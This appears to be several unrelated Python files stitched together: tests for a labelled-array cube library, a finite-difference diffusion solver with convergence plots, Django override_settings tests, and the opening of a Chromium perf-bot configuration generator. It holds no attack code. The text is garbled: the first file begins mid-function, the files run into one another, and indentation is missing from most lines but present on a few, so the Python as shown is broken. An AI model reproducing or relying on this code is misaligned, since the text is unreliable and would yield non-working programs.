# accepting a slice as an argument
slc = slice(0, 3, 2)
d = c.slice(1, slc) # 1 = quarter axis
self.assertTrue(np.array_equal(d.values, c.values[:, 0: 3: 2]))
def test_compress(self):
c = year_quarter_cube()
d = c.compress(0, [True, False, False])
self.assertTrue(np.array_equal(d.values, [[0, 1, 2, 3]]))
self.assertEqual(d.ndim, 2)
self.assertEqual(tuple(d.dims), ("year", "quarter"))
e = c.compress("quarter", [True, False, True, False])
self.assertTrue(np.array_equal(e.values, [[0, 2], [4, 6], [8, 10]]))
# using numpy array of bools
        e = c.compress(0, np.arange(1, 4) <= 1)
        self.assertTrue(np.array_equal(e.values, [[0, 1, 2, 3]]))
        self.assertEqual(e.ndim, 2)
        self.assertEqual(e.dims, ("year", "quarter"))
# ints instead of bools; 0 = False, other = True
# similarly for other types; Python bool conversion is used
d = c.compress(0, [1, 0, 0])
self.assertTrue(np.array_equal(d.values, [[0, 1, 2, 3]]))
self.assertEqual(d.ndim, 2)
self.assertEqual(d.dims, ("year", "quarter"))
# wrong length of bool collection - too short ...
d = c.compress(0, [True, False]) # unspecified means False
self.assertTrue(np.array_equal(d.values, [[0, 1, 2, 3]]))
# ... and too long
d = c.compress(0, [True, False, False, False]) # this is OK, the extra False is ignored
self.assertTrue(np.array_equal(d.values, [[0, 1, 2, 3]]))
self.assertRaises(IndexError, c.compress, 0, [True, False, False, True]) # but this is not OK
def test_insert_axis(self):
c = year_quarter_cube()
countries = Axis("country", ["DE", "FR"])
# insert as the first axis
d = c.insert_axis(countries, 0)
self.assertEqual(d.ndim, 3)
self.assertEqual(tuple(d.dims), ("country", "year", "quarter"))
self.assertEqual(d.shape, (2, 3, 4))
# the values in each sub-cube must be equal to the original cube
self.assertTrue((d.take("country", 0) == c).all())
self.assertTrue((d.take("country", 1) == c).all())
# append as the last axis
d = c.insert_axis(countries, -1)
self.assertEqual(d.ndim, 3)
self.assertEqual(tuple(d.dims), ("year", "quarter", "country"))
self.assertEqual(d.shape, (3, 4, 2))
# the values in each sub-cube must be equal to the original cube
self.assertTrue((d.take("country", 0) == c).all())
self.assertTrue((d.take("country", 1) == c).all())
def test_replace_axis(self):
c = year_quarter_cube()
self.assertEqual(c.dims, ("year", "quarter"))
ax = Axis("Y", [2000, 2010, 2020])
d = c.replace_axis("year", ax)
e = c.replace_axis(0, ax)
f = c.replace_axis(c.axis("year"), ax)
self.assertEqual(d.dims, ("Y", "quarter"))
self.assertEqual(d.dims, e.dims)
self.assertEqual(d.dims, f.dims)
self.assertRaises(NonUniqueDimNamesError, c.replace_axis, "year", Axis("quarter", [1, 2, 3]))
self.assertRaises(InvalidAxisLengthError, c.replace_axis, "year", Axis("Y", [2010, 2020]))
self.assertRaises(InvalidAxisLengthError, c.replace_axis, "year", Axis("Y", [2010, 2020, 2030, 2040]))
|
|
# finite-difference implementation of the diffusion equation with first-order
# explicit time discretization
#
# We are solving phi_t = k phi_xx
#
# We run at several resolutions and compute the error. This uses a
# cell-centered finite-difference grid
#
# M. Zingale (2013-04-07)
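#
# Discretization note (added for clarity): with forward-Euler time integration and
# a centered second difference in space, the update implemented below is
#
#   phi^{n+1}_i = phi^n_i + alpha*(phi^n_{i+1} - 2*phi^n_i + phi^n_{i-1}),
#   alpha = k*dt/dx**2
#
# which is stable only for dt <= dx**2/(2*k); the parameter C used below scales the
# timestep relative to that limit, so C <= 1 is required for stability.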
import numpy
import pylab
import sys
class Grid1d:
def __init__(self, nx, ng=1, xmin=0.0, xmax=1.0):
""" grid class initialization """
self.nx = nx
self.ng = ng
self.xmin = xmin
self.xmax = xmax
self.dx = (xmax - xmin)/nx
self.x = (numpy.arange(nx+2*ng) + 0.5 - ng)*self.dx + xmin
self.ilo = ng
self.ihi = ng+nx-1
# storage for the solution
self.phi = numpy.zeros((nx+2*ng), dtype=numpy.float64)
def fillBC(self):
""" fill the Neumann BCs """
# Neumann BCs
self.phi[0:self.ilo] = self.phi[self.ilo]
self.phi[self.ihi+1:] = self.phi[self.ihi]
def scratch_array(self):
return numpy.zeros((2*self.ng+self.nx), dtype=numpy.float64)
def norm(self, e):
""" return the norm of quantity e which lives on the grid """
if not len(e) == (2*self.ng + self.nx):
return None
return numpy.sqrt(self.dx*numpy.sum(e[self.ilo:self.ihi+1]**2))
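# Analytic reference solution (matches phi_a below): a Gaussian spreading diffusively,
#   phi(x, t) = (phi2 - phi1)*sqrt(t0/(t + t0))*exp(-(x - xc)**2/(4*k*(t + t0))) + phi1
# where t0 sets the initial width and xc the centre of the profile.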
def phi_a(t, k, x, xc, t0, phi1, phi2):
""" analytic solution for the diffusion of a Gaussian """
return (phi2 - phi1)*numpy.sqrt(t0/(t + t0)) * \
numpy.exp(-0.25*(x-xc)**2/(k*(t + t0))) + phi1
class Simulation:
def __init__(self, grid, k=1.0):
self.grid = grid
self.t = 0.0
self.k = k # diffusion coefficient
def init_cond(self, name, *args):
if name == "gaussian":
# initialize the data
xc = 0.5*(self.grid.xmin + self.grid.xmax)
t0, phi1, phi2 = args
self.grid.phi[:] = phi_a(0.0, self.k, self.grid.x, xc, t0, phi1, phi2)
def evolve(self, C, tmax):
gr = self.grid
# time info
dt = C*0.5*gr.dx**2/self.k
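        # dt is C times the explicit stability limit dx**2/(2*k); C <= 1 gives a stable scheme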
phinew = gr.scratch_array()
while self.t < tmax:
# make sure we end right at tmax
if self.t + dt > tmax:
dt = tmax - self.t
# fill the boundary conditions
gr.fillBC()
alpha = self.k*dt/gr.dx**2
# loop over zones
            i = gr.ilo
            while (i <= gr.ihi):
# explicit diffusion
phinew[i] = gr.phi[i] + \
alpha*(gr.phi[i+1] - 2.0*gr.phi[i] + gr.phi[i-1])
i += 1
# store the updated solution
gr.phi[:] = phinew[:]
self.t += dt
#-----------------------------------------------------------------------------
# diffusion coefficient
k = 1.0
# reference time
t0 = 1.e-4
# state coeffs
phi1 = 1.0
phi2 = 2.0
# solution at multiple times
# a characteristic timescale for diffusion is L^2/k
tmax = 0.0008
nx = 128
C = 0.8
ntimes = 4
tend = tmax/10.0**ntimes
c = ["0.5", "r", "g", "b", "k"]
while tend <= tmax:
g = Grid1d(nx, ng=2)
s = Simulation(g, k=k)
s.init_cond("gaussian", t0, phi1, phi2)
s.evolve(C, tend)
xc = 0.5*(g.xmin + g.xmax)
phi_analytic = phi_a(tend, k, g.x, xc, t0, phi1, phi2)
color = c.pop()
pylab.plot(g.x[g.ilo:g.ihi+1], g.phi[g.ilo:g.ihi+1],
"x", color=color, label="$t = %g$ s" % (tend))
pylab.plot(g.x[g.ilo:g.ihi+1], phi_analytic[g.ilo:g.ihi+1],
color=color, ls=":")
tend = 10.0*tend
pylab.xlim(0.35,0.65)
pylab.legend(frameon=False, fontsize="small")
pylab.xlabel("$x$")
pylab.ylabel(r"$\phi$")
pylab.title("explicit diffusion, nx = %d, C = %3.2f" % (nx, C))
pylab.savefig("diff-explicit-{}.png".format(nx))
#-----------------------------------------------------------------------------
# convergence
# a characteristic timescale for diffusion is L^2/k
tmax = 0.005
t0 = 1.e-4
phi1 = 1.0
phi2 = 2.0
k = 1.0
N = [32, 64, 128, 256, 512]
# CFL number
C = 0.8
err = []
for nx in N:
    print(nx)
    # the explicit discretization at the present resolution
g = Grid1d(nx, ng=1)
s = Simulation(g, k=k)
s.init_cond("gaussian", t0, phi1, phi2)
s.evolve(C, tmax)
xc = 0.5*(g.xmin + g.xmax)
phi_analytic = phi_a(tmax, k, g.x, xc, t0, phi1, phi2)
err.append(g.norm(g.phi - phi_analytic))
pylab.clf()
N = numpy.array(N, dtype=numpy.float64)
err = numpy.array(err)
pylab.scatter(N, err, color="r", label="explicit diffusion")
pylab.loglog(N, err[len(N)-1]*(N[len(N)-1]/N)**2, color="k", label=r"$\mathcal{O}(\Delta x^2)$")
pylab.xlabel(r"$N$")
pylab.ylabel(r"L2 norm of absolute error")
pylab.title("Convergence of Explicit Diffusion, C = %3.2f, t = %5.2g" % (C, tmax))
pylab.ylim(1.e-6, 1.e-2)
pylab.legend(frameon=False, fontsize="small")
pylab.savefig("diffexplicit-converge-{}.png".format(C))
#-----------------------------------------------------------------------------
# exceed the timestep limit
pylab.clf()
# a characteristic timescale for diffusion is L^2/k
tmax = 0.005
nx = 64
C = 2.0
g = Grid1d(nx, ng=2)
s = Simulation(g, k=k)
s.init_cond("gaussian", t0, phi1, phi2)
s.evolve(C, tmax)
xc = 0.5*(g.xmin + g.xmax)
phi_analytic = phi_a(tmax, k, g.x, xc, t0, phi1, phi2)
pylab.plot(g.x[g.ilo:g.ihi+1], g.phi[g.ilo:g.ihi+1],
"x-", color="r", label="$t = %g$ s" % (tmax))
pylab.plot(g.x[g.ilo:g.ihi+1], phi_analytic[g.ilo:g.ihi+1],
color="0.5", ls=":")
pylab.xlim(0.35,0.65)
pylab.xlabel("$x$")
pylab.ylabel(r"$\phi$")
pylab.title("explicit diffusion, nx = %d, C = %3.2f, t = %5.2g" % (nx, C, tmax))
pylab.savefig("diff-explicit-64-bad.png")
|
|
import os
import sys
import unittest
import warnings
from types import ModuleType
from django.conf import ENVIRONMENT_VARIABLE, LazySettings, Settings, settings
from django.core.exceptions import ImproperlyConfigured
from django.http import HttpRequest
from django.test import (
SimpleTestCase, TestCase, TransactionTestCase, modify_settings,
override_settings, signals,
)
@modify_settings(ITEMS={
'prepend': ['b'],
'append': ['d'],
'remove': ['a', 'e']
})
@override_settings(ITEMS=['a', 'c', 'e'], ITEMS_OUTER=[1, 2, 3], TEST='override', TEST_OUTER='outer')
class FullyDecoratedTranTestCase(TransactionTestCase):
available_apps = []
def test_override(self):
self.assertEqual(settings.ITEMS, ['b', 'c', 'd'])
self.assertEqual(settings.ITEMS_OUTER, [1, 2, 3])
self.assertEqual(settings.TEST, 'override')
self.assertEqual(settings.TEST_OUTER, 'outer')
@modify_settings(ITEMS={
'append': ['e', 'f'],
'prepend': ['a'],
'remove': ['d', 'c'],
})
def test_method_list_override(self):
self.assertEqual(settings.ITEMS, ['a', 'b', 'e', 'f'])
self.assertEqual(settings.ITEMS_OUTER, [1, 2, 3])
@modify_settings(ITEMS={
'append': ['b'],
'prepend': ['d'],
'remove': ['a', 'c', 'e'],
})
def test_method_list_override_no_ops(self):
self.assertEqual(settings.ITEMS, ['b', 'd'])
@modify_settings(ITEMS={
'append': 'e',
'prepend': 'a',
'remove': 'c',
})
def test_method_list_override_strings(self):
self.assertEqual(settings.ITEMS, ['a', 'b', 'd', 'e'])
@modify_settings(ITEMS={'remove': ['b', 'd']})
@modify_settings(ITEMS={'append': ['b'], 'prepend': ['d']})
def test_method_list_override_nested_order(self):
self.assertEqual(settings.ITEMS, ['d', 'c', 'b'])
@override_settings(TEST='override2')
def test_method_override(self):
self.assertEqual(settings.TEST, 'override2')
self.assertEqual(settings.TEST_OUTER, 'outer')
def test_decorated_testcase_name(self):
self.assertEqual(FullyDecoratedTranTestCase.__name__, 'FullyDecoratedTranTestCase')
def test_decorated_testcase_module(self):
self.assertEqual(FullyDecoratedTranTestCase.__module__, __name__)
@modify_settings(ITEMS={
'prepend': ['b'],
'append': ['d'],
'remove': ['a', 'e']
})
@override_settings(ITEMS=['a', 'c', 'e'], TEST='override')
class FullyDecoratedTestCase(TestCase):
def test_override(self):
self.assertEqual(settings.ITEMS, ['b', 'c', 'd'])
self.assertEqual(settings.TEST, 'override')
@modify_settings(ITEMS={
'append': 'e',
'prepend': 'a',
'remove': 'c',
})
@override_settings(TEST='override2')
def test_method_override(self):
self.assertEqual(settings.ITEMS, ['a', 'b', 'd', 'e'])
self.assertEqual(settings.TEST, 'override2')
class ClassDecoratedTestCaseSuper(TestCase):
"""
Dummy class for testing max recursion error in child class call to
super(). Refs #17011.
"""
def test_max_recursion_error(self):
pass
@override_settings(TEST='override')
class ClassDecoratedTestCase(ClassDecoratedTestCaseSuper):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.foo = getattr(settings, 'TEST', 'BUG')
def test_override(self):
self.assertEqual(settings.TEST, 'override')
def test_setupclass_override(self):
"""Settings are overridden within setUpClass (#21281)."""
self.assertEqual(self.foo, 'override')
@override_settings(TEST='override2')
def test_method_override(self):
self.assertEqual(settings.TEST, 'override2')
def test_max_recursion_error(self):
"""
Overriding a method on a super class and then calling that method on
the super class should not trigger infinite recursion. See #17011.
"""
super().test_max_recursion_error()
@modify_settings(ITEMS={'append': 'mother'})
@override_settings(ITEMS=['father'], TEST='override-parent')
class ParentDecoratedTestCase(TestCase):
pass
@modify_settings(ITEMS={'append': ['child']})
@override_settings(TEST='override-child')
class ChildDecoratedTestCase(ParentDecoratedTestCase):
def test_override_settings_inheritance(self):
self.assertEqual(settings.ITEMS, ['father', 'mother', 'child'])
self.assertEqual(settings.TEST, 'override-child')
class SettingsTests(SimpleTestCase):
def setUp(self):
self.testvalue = None
signals.setting_changed.connect(self.signal_callback)
def tearDown(self):
signals.setting_changed.disconnect(self.signal_callback)
def signal_callback(self, sender, setting, value, **kwargs):
if setting == 'TEST':
self.testvalue = value
def test_override(self):
settings.TEST = 'test'
self.assertEqual('test', settings.TEST)
with self.settings(TEST='override'):
self.assertEqual('override', settings.TEST)
self.assertEqual('test', settings.TEST)
del settings.TEST
def test_override_change(self):
settings.TEST = 'test'
self.assertEqual('test', settings.TEST)
with self.settings(TEST='override'):
self.assertEqual('override', settings.TEST)
settings.TEST = 'test2'
self.assertEqual('test', settings.TEST)
del settings.TEST
def test_override_doesnt_leak(self):
with self.assertRaises(AttributeError):
getattr(settings, 'TEST')
with self.settings(TEST='override'):
self.assertEqual('override', settings.TEST)
settings.TEST = 'test'
with self.assertRaises(AttributeError):
getattr(settings, 'TEST')
@override_settings(TEST='override')
def test_decorator(self):
self.assertEqual('override', settings.TEST)
def test_context_manager(self):
with self.assertRaises(AttributeError):
getattr(settings, 'TEST')
override = override_settings(TEST='override')
with self.assertRaises(AttributeError):
getattr(settings, 'TEST')
override.enable()
self.assertEqual('override', settings.TEST)
override.disable()
with self.assertRaises(AttributeError):
getattr(settings, 'TEST')
def test_class_decorator(self):
# SimpleTestCase can be decorated by override_settings, but not unittest.TestCase
class SimpleTestCaseSubclass(SimpleTestCase):
pass
class UnittestTestCaseSubclass(unittest.TestCase):
pass
decorated = override_settings(TEST='override')(SimpleTestCaseSubclass)
self.assertIsInstance(decorated, type)
self.assertTrue(issubclass(decorated, SimpleTestCase))
with self.assertRaisesMessage(Exception, "Only subclasses of Django SimpleTestCase"):
decorated = override_settings(TEST='override')(UnittestTestCaseSubclass)
def test_signal_callback_context_manager(self):
with self.assertRaises(AttributeError):
getattr(settings, 'TEST')
with self.settings(TEST='override'):
self.assertEqual(self.testvalue, 'override')
self.assertIsNone(self.testvalue)
@override_settings(TEST='override')
def test_signal_callback_decorator(self):
self.assertEqual(self.testvalue, 'override')
#
# Regression tests for #10130: deleting settings.
#
def test_settings_delete(self):
settings.TEST = 'test'
self.assertEqual('test', settings.TEST)
del settings.TEST
with self.assertRaises(AttributeError):
getattr(settings, 'TEST')
def test_settings_delete_wrapped(self):
with self.assertRaises(TypeError):
delattr(settings, '_wrapped')
def test_override_settings_delete(self):
"""
Allow deletion of a setting in an overridden settings set (#18824)
"""
previous_i18n = settings.USE_I18N
previous_l10n = settings.USE_L10N
with self.settings(USE_I18N=False):
del settings.USE_I18N
with self.assertRaises(AttributeError):
getattr(settings, 'USE_I18N')
# Should also work for a non-overridden setting
del settings.USE_L10N
with self.assertRaises(AttributeError):
getattr(settings, 'USE_L10N')
self.assertNotIn('USE_I18N', dir(settings))
self.assertNotIn('USE_L10N', dir(settings))
self.assertEqual(settings.USE_I18N, previous_i18n)
self.assertEqual(settings.USE_L10N, previous_l10n)
def test_override_settings_nested(self):
"""
override_settings uses the actual _wrapped attribute at
runtime, not when it was instantiated.
"""
with self.assertRaises(AttributeError):
getattr(settings, 'TEST')
with self.assertRaises(AttributeError):
getattr(settings, 'TEST2')
inner = override_settings(TEST2='override')
with override_settings(TEST='override'):
self.assertEqual('override', settings.TEST)
with inner:
self.assertEqual('override', settings.TEST)
self.assertEqual('override', settings.TEST2)
# inner's __exit__ should have restored the settings of the outer
# context manager, not those when the class was instantiated
self.assertEqual('override', settings.TEST)
with self.assertRaises(AttributeError):
getattr(settings, 'TEST2')
with self.assertRaises(AttributeError):
getattr(settings, 'TEST')
with self.assertRaises(AttributeError):
getattr(settings, 'TEST2')
class TestComplexSettingOverride(SimpleTestCase):
def setUp(self):
self.old_warn_override_settings = signals.COMPLEX_OVERRIDE_SETTINGS.copy()
signals.COMPLEX_OVERRIDE_SETTINGS.add('TEST_WARN')
def tearDown(self):
signals.COMPLEX_OVERRIDE_SETTINGS = self.old_warn_override_settings
self.assertNotIn('TEST_WARN', signals.COMPLEX_OVERRIDE_SETTINGS)
def test_complex_override_warning(self):
"""Regression test for #19031"""
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
with override_settings(TEST_WARN='override'):
self.assertEqual(settings.TEST_WARN, 'override')
self.assertEqual(len(w), 1)
self.assertEqual(w[0].filename, __file__)
self.assertEqual(str(w[0].message), 'Overriding setting TEST_WARN can lead to unexpected behavior.')
class SecureProxySslHeaderTest(SimpleTestCase):
@override_settings(SECURE_PROXY_SSL_HEADER=None)
def test_none(self):
req = HttpRequest()
self.assertIs(req.is_secure(), False)
@override_settings(SECURE_PROXY_SSL_HEADER=('HTTP_X_FORWARDED_PROTOCOL', 'https'))
def test_set_without_xheader(self):
req = HttpRequest()
self.assertIs(req.is_secure(), False)
@override_settings(SECURE_PROXY_SSL_HEADER=('HTTP_X_FORWARDED_PROTOCOL', 'https'))
def test_set_with_xheader_wrong(self):
req = HttpRequest()
req.META['HTTP_X_FORWARDED_PROTOCOL'] = 'wrongvalue'
self.assertIs(req.is_secure(), False)
@override_settings(SECURE_PROXY_SSL_HEADER=('HTTP_X_FORWARDED_PROTOCOL', 'https'))
def test_set_with_xheader_right(self):
req = HttpRequest()
req.META['HTTP_X_FORWARDED_PROTOCOL'] = 'https'
self.assertIs(req.is_secure(), True)
class IsOverriddenTest(SimpleTestCase):
def test_configure(self):
s = LazySettings()
s.configure(SECRET_KEY='foo')
self.assertTrue(s.is_overridden('SECRET_KEY'))
def test_module(self):
settings_module = ModuleType('fake_settings_module')
settings_module.SECRET_KEY = 'foo'
sys.modules['fake_settings_module'] = settings_module
try:
s = Settings('fake_settings_module')
self.assertTrue(s.is_overridden('SECRET_KEY'))
self.assertFalse(s.is_overridden('ALLOWED_HOSTS'))
finally:
del sys.modules['fake_settings_module']
def test_override(self):
self.assertFalse(settings.is_overridden('ALLOWED_HOSTS'))
with override_settings(ALLOWED_HOSTS=[]):
self.assertTrue(settings.is_overridden('ALLOWED_HOSTS'))
def test_unevaluated_lazysettings_repr(self):
lazy_settings = LazySettings()
expected = '<LazySettings [Unevaluated]>'
self.assertEqual(repr(lazy_settings), expected)
def test_evaluated_lazysettings_repr(self):
lazy_settings = LazySettings()
module = os.environ.get(ENVIRONMENT_VARIABLE)
expected = '<LazySettings "%s">' % module
# Force evaluation of the lazy object.
lazy_settings.APPEND_SLASH
self.assertEqual(repr(lazy_settings), expected)
def test_usersettingsholder_repr(self):
lazy_settings = LazySettings()
lazy_settings.configure(APPEND_SLASH=False)
expected = '<UserSettingsHolder>'
self.assertEqual(repr(lazy_settings._wrapped), expected)
def test_settings_repr(self):
module = os.environ.get(ENVIRONMENT_VARIABLE)
lazy_settings = Settings(module)
expected = '<Settings "%s">' % module
self.assertEqual(repr(lazy_settings), expected)
class TestListSettings(unittest.TestCase):
"""
Make sure settings that should be lists or tuples throw
ImproperlyConfigured if they are set to a string instead of a list or tuple.
"""
list_or_tuple_settings = (
"INSTALLED_APPS",
"TEMPLATE_DIRS",
"LOCALE_PATHS",
)
def test_tuple_settings(self):
settings_module = ModuleType('fake_settings_module')
settings_module.SECRET_KEY = 'foo'
for setting in self.list_or_tuple_settings:
setattr(settings_module, setting, ('non_list_or_tuple_value'))
sys.modules['fake_settings_module'] = settings_module
try:
with self.assertRaises(ImproperlyConfigured):
Settings('fake_settings_module')
finally:
del sys.modules['fake_settings_module']
delattr(settings_module, setting)
|
|
#!/usr/bin/env vpython
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=too-many-lines
# pylint: disable=line-too-long
"""Generates chromium.perf{,.fyi}.json from a set of condensed configs.
This file contains condensed configurations for the perf bots along with
logic to inflate those into the full (unwieldy) configurations in
//testing/buildbot that are consumed by the chromium recipe code.
"""
from __future__ import print_function
import argparse
import collections
import csv
import filecmp
import json
import os
import re
import shutil
import sys
import tempfile
import textwrap
from chrome_telemetry_build import android_browser_types
from core import benchmark_finders
from core import benchmark_utils
from core import bot_platforms
from core import path_util
from core import undocumented_benchmarks as ub_module
path_util.AddTelemetryToPath()
from telemetry import decorators
# The condensed configurations below get inflated into the perf builder
# configurations in //testing/buildbot. The expected format of these is:
#
# {
# 'builder_name1': {
# # Targets that the builder should compile in addition to those
# # required for tests, as a list of strings.
# 'additional_compile_targets': ['target1', 'target2', ...],
#
# 'tests': [
# {
# # Arguments to pass to the test suite as a list of strings.
# 'extra_args': ['--arg1', '--arg2', ...],
#
# # Name of the isolate to run as a string.
# 'isolate': 'isolate_name',
#
# # Name of the test suite as a string.
# # If not present, will default to `isolate`.
# 'name': 'presentation_name',
#
# # The number of shards for this test as an int.
# # This is only required for GTEST tests since this is defined
# # in bot_platforms.py for Telemetry tests.
# 'num_shards': 2,
#
# # What kind of test this is; for options, see TEST_TYPES
# # below. Defaults to TELEMETRY.
# 'type': TEST_TYPES.TELEMETRY,
# },
# ...
# ],
#
# # Testing platform, as a string. Used in determining the browser
# # argument to pass to telemetry.
# 'platform': 'platform_name',
#
# # Dimensions to pass to swarming, as a dict of string keys & values.
# 'dimension': {
# 'dimension1_name': 'dimension1_value',
# ...
# },
# },
# ...
# }
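#
# As a purely illustrative sketch (the builder name is hypothetical; the
# real entries live in BUILDERS, FYI_BUILDERS and CALIBRATION_BUILDERS
# below), a minimal condensed config could look like:
#
# {
#     'example-linux-perf': {
#         'tests': [
#             {
#                 'isolate': 'performance_test_suite',
#                 'extra_args': ['--assert-gpu-compositing'],
#             },
#         ],
#         'platform': 'linux',
#         'dimension': {
#             'os': 'Ubuntu-18.04',
#             'pool': 'chrome.tests.perf',
#         },
#     },
# }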
class TEST_TYPES(object):
GENERIC = 0
GTEST = 1
TELEMETRY = 2
ALL = (GENERIC, GTEST, TELEMETRY)
# This is an opt-in list of testers which will skip the perf data handling.
# The perf data will be handled on a separate 'processor' VM.
# This list will be removed or replaced by an opt-out list.
LIGHTWEIGHT_TESTERS = [
'android-go-perf', 'android-pixel2-perf', 'android-pixel2_webview-perf',
'linux-perf', 'mac-10_12_laptop_low_end-perf',
'mac-10_13_laptop_high_end-perf', 'win-10-perf',
'win-10_laptop_low_end-perf'
]
# This is an opt-in list of builders which use dynamic sharding.
DYNAMIC_SHARDING_TESTERS = [
'android-pixel2-perf', 'android-pixel2-perf-fyi',
'android-pixel2-perf-calibration', 'linux-perf-calibration'
]
CALIBRATION_BUILDERS = {
'linux-perf-calibration': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'linux',
'dimension': {
'gpu': '10de:1cb3-440.100',
'os': 'Ubuntu-18.04',
'pool': 'chrome.tests.perf',
'synthetic_product_name': 'PowerEdge R230 (Dell Inc.)'
},
},
'android-pixel2-perf-calibration': {
'tests': [{
'isolate':
'performance_test_suite_android_clank_monochrome_64_32_bundle',
}],
'platform':
'android-chrome-64-bundle',
'dimension': {
'pool': 'chrome.tests.perf',
'os': 'Android',
'device_type': 'walleye',
'device_os': 'OPM1.171019.021',
'device_os_flavor': 'google',
},
},
}
FYI_BUILDERS = {
'android-cfi-builder-perf-fyi': {
'additional_compile_targets': [
'android_tools',
'cc_perftests',
'chrome_public_apk',
'chromium_builder_perf',
'gpu_perftests',
'push_apps_to_background_apk',
'system_webview_apk',
'system_webview_shell_apk',
],
},
'android-nexus5x-perf-fyi': {
'tests': [{
'isolate':
'performance_test_suite_android_clank_chrome',
'extra_args': [
'--output-format=histograms',
'--experimental-tbmv3-metrics',
],
}],
'platform':
'android-chrome',
'dimension': {
'pool': 'chrome.tests.perf-fyi',
'os': 'Android',
'device_type': 'bullhead',
'device_os': 'MMB29Q',
'device_os_flavor': 'google',
},
},
'android-pixel2-perf-fyi': {
'tests': [{
'isolate':
'performance_test_suite_android_clank_chrome',
'extra_args': [
'--output-format=histograms',
'--experimental-tbmv3-metrics',
],
}],
'platform':
'android-chrome',
'browser':
'bin/monochrome_64_32_bundle',
'dimension': {
'pool': 'chrome.tests.perf-fyi',
'os': 'Android',
'device_type': 'walleye',
'device_os': 'O',
'device_os_flavor': 'google',
},
},
'android-pixel2-perf-aab-fyi': {
'tests': [{
'isolate':
'performance_test_suite_android_clank_monochrome_bundle',
}],
'platform':
'android-chrome-bundle',
'dimension': {
'pool': 'chrome.tests.perf-fyi',
'os': 'Android',
'device_type': 'walleye',
'device_os': 'O',
'device_os_flavor': 'google',
},
},
'android_arm64-cfi-builder-perf-fyi': {
'additional_compile_targets': [
'android_tools',
'cc_perftests',
'chrome_public_apk',
'chromium_builder_perf',
'gpu_perftests',
'push_apps_to_background_apk',
'system_webview_apk',
'system_webview_shell_apk',
],
},
'linux-perf-fyi': {
'tests': [{
'isolate':
'performance_test_suite',
'extra_args': [
'--output-format=histograms',
'--experimental-tbmv3-metrics',
],
}],
'platform':
'linux',
'dimension': {
'gpu': '10de',
'id': 'build186-b7',
'os': 'Ubuntu-14.04',
'pool': 'chrome.tests.perf-fyi',
},
},
'fuchsia-perf-fyi': {
'tests': [{
'isolate':
'performance_web_engine_test_suite',
'extra_args': [
'--output-format=histograms',
'--experimental-tbmv3-metrics',
'-d',
'--system-image-dir=../../third_party/fuchsia-sdk/images-internal/astro-release/smart_display_eng_arrested',
'--os-check=update',
],
'type':
TEST_TYPES.TELEMETRY,
}],
'platform':
'fuchsia',
'dimension': {
'cpu': None,
'device_type': 'Astro',
'os': 'Fuchsia',
'pool': 'chrome.tests',
},
},
'win-10_laptop_low_end-perf_HP-Candidate': {
'tests': [
{
'isolate':
'performance_test_suite',
'extra_args': [
'--output-format=histograms',
'--experimental-tbmv3-metrics',
],
},
],
'platform':
'win',
'target_bits':
64,
'dimension': {
'pool': 'chrome.tests.perf-fyi',
'id': 'build370-a7',
# TODO(crbug.com/971204): Explicitly set the gpu to None to make
# chromium_swarming recipe_module ignore this dimension.
'gpu': None,
'os': 'Windows-10',
},
},
'chromeos-kevin-builder-perf-fyi': {
'additional_compile_targets': ['chromium_builder_perf'],
},
'chromeos-kevin-perf-fyi': {
'tests': [
{
'isolate':
'performance_test_suite',
'extra_args': [
# The magic hostname that resolves to a CrOS device in the test lab
'--remote=variable_chromeos_device_hostname',
],
},
],
'platform':
'chromeos',
'target_bits':
32,
'dimension': {
'pool': 'chrome.tests',
# TODO(crbug.com/971204): Explicitly set the gpu to None to make
# chromium_swarming recipe_module ignore this dimension.
'gpu': None,
'os': 'ChromeOS',
'device_type': 'kevin',
},
},
'fuchsia-builder-perf-fyi': {
'additional_compile_targets': [
'web_engine_shell_pkg', 'cast_runner_pkg', 'web_runner_pkg',
'chromedriver', 'chromium_builder_perf'
],
},
}
# These configurations are taken from chromium_perf.py in
# build/scripts/slave/recipe_modules/chromium_tests and must be kept in sync
# to generate the correct json for each tester
#
# The dimensions in pinpoint configs, excluding the dimension "pool",
# must be kept in sync with the dimensions here.
# This is to make sure the same type of machines are used between waterfall
# tests and pinpoint jobs
#
# On desktop builders, chromedriver is added as an additional compile target.
# The perf waterfall builds this target for each commit, and the resulting
# ChromeDriver is archived together with Chrome for use in bisecting.
# This can be used by Chrome test team, as well as by google3 teams for
# bisecting Chrome builds with their web tests. For questions or to report
# issues, please contact johnchen@chromium.org.
BUILDERS = {
'android-builder-perf': {
'additional_compile_targets': [
'microdump_stackwalk',
'chrome_apk',
'system_webview_google_apk',
'android_tools',
'cc_perftests',
'chrome_public_apk',
'chromium_builder_perf',
'dump_syms',
'gpu_perftests',
'push_apps_to_background_apk',
'system_webview_apk',
'system_webview_shell_apk',
],
'tests': [
{
'name': 'resource_sizes_monochrome_minimal_apks',
'isolate': 'resource_sizes_monochrome_minimal_apks',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_monochrome_public_minimal_apks',
'isolate': 'resource_sizes_monochrome_public_minimal_apks',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_chrome_modern_minimal_apks',
'isolate': 'resource_sizes_chrome_modern_minimal_apks',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_chrome_modern_public_minimal_apks',
'isolate': 'resource_sizes_chrome_modern_public_minimal_apks',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_trichrome_google',
'isolate': 'resource_sizes_trichrome_google',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_system_webview_bundle',
'isolate': 'resource_sizes_system_webview_bundle',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_system_webview_google_bundle',
'isolate': 'resource_sizes_system_webview_google_bundle',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
],
'dimension': {
'cpu': 'x86',
'os': 'Ubuntu-16.04',
'pool': 'chrome.tests',
},
